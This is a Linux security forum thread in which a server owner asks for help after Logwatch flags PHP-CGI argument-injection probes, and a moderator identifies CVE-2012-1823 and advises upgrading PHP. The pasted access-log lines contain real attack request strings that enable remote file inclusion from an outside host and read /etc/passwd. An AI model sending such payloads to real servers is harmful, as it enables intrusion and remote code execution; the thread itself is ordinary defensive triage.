LinuxQuestions.org
Share your knowledge at the LQ Wiki.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 10-31-2012, 10:15 AM   #1
Metux
LQ Newbie
 
Registered: Oct 2012
Posts: 2

Rep: Reputation: Disabled
Logwatch : A total of 1 possible successful probes were detected


Hi eveybody, i need some help to figure out how this succesful request can damage my server.

A total of 3 sites probed the server
31.186.97.13
61.12.24.55
85.192.244.22

A total of 1 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
indicate a possible exploit):

/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP Response 200

Here is what i have in the /var/log/apache2/acces.log:

Code:
209.135.33.180 - - [31/Oct/2012:07:01:41 +0100] "POST /?d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://rockingham911.org/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://rockingham911.org/api.gif%20-n HTTP/1.1" 200 7272 "" "Mozilla/5.0"
 Envoyé mercredi à 09:40
I don't really know what to do, so i just added in my "firewall" named script for iptables this:
Code:
#209.135.33.180 - - [31/Oct/2012:07:01:41 +0100] "POST /?d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://rockingham911.org/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend    _file%3Dhttp://rockingham911.org/api.gif%20-n HTTP/1.1" 200 7272 "" "Mozilla/5.0"
109 iptables -A INPUT -s 209.135.33.180 -j DROP
Here is what i understood:
- /?: the ? is a flag for POST
- It s an attempt to use a rootkit
- The url of the rootkit is here: http://rockingham911.org/api.gif%20-n
- And it uses auto-prepend_file function to make sure he can include whatever he wants to execute his rootkit.

In my php.ini i have by default:
Code:
allow_url_include = Off

I also use a specific variable from my application that i send to my php files to make sure nobody else can execute my phpfiles without this variable.

And i installed Suphp, so the user www-data doesnt execute anymore php files.
Im sure nobody did connect as root, because i send myself an email each time a user logs in the server as root.(but maybe its not enough to be sure 100%)

Can you tell me if i did good, and explain me what can i do to verifiy that he couldnt damage my server.

Thanks.
 
Old 10-31-2012, 12:57 PM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,944
Blog Entries: 54

Rep: Reputation: 2731Reputation: 2731Reputation: 2731Reputation: 2731Reputation: 2731Reputation: 2731Reputation: 2731Reputation: 2731Reputation: 2731Reputation: 2731Reputation: 2731
Quote:
Originally Posted by Metux View Post
/?-d%20allow_url_include
The core issue here is CVE-2012-1823: http://www.linuxquestions.org/questi...4/#post4692267 ..

Quote:
Originally Posted by Metux View Post
Can you tell me if i did good,
.. reading the links mentioned above show you the relevant actions to perform, of which the first and most important one is checking your PHP version and if vulnerable upgrading it.
 
Old 11-08-2012, 07:26 AM   #3
Metux
LQ Newbie
 
Registered: Oct 2012
Posts: 2

Original Poster
Rep: Reputation: Disabled
thx, i have a lot to read and learn
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
HP printer successful driver install but no printer detected dwhb Linux - Hardware 14 11-01-2012 11:40 AM
Apache exploit? Logwatch: A total of 2 possible successful probes were detected deathsfriend99 Linux - Security 1 10-24-2011 03:16 PM
LogWatch: "possible successful probes"? Quip11 Linux - Security 1 07-20-2009 04:39 PM
What's this in LogWatch: "!!!! 1 possible successful probes" ? bomix Linux - Security 1 07-29-2005 10:23 PM
logwatch: A total of 3 unidentified 'other' records logged rioguia Linux - Security 2 11-12-2004 09:12 AM


All times are GMT -5. The time now is 10:48 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration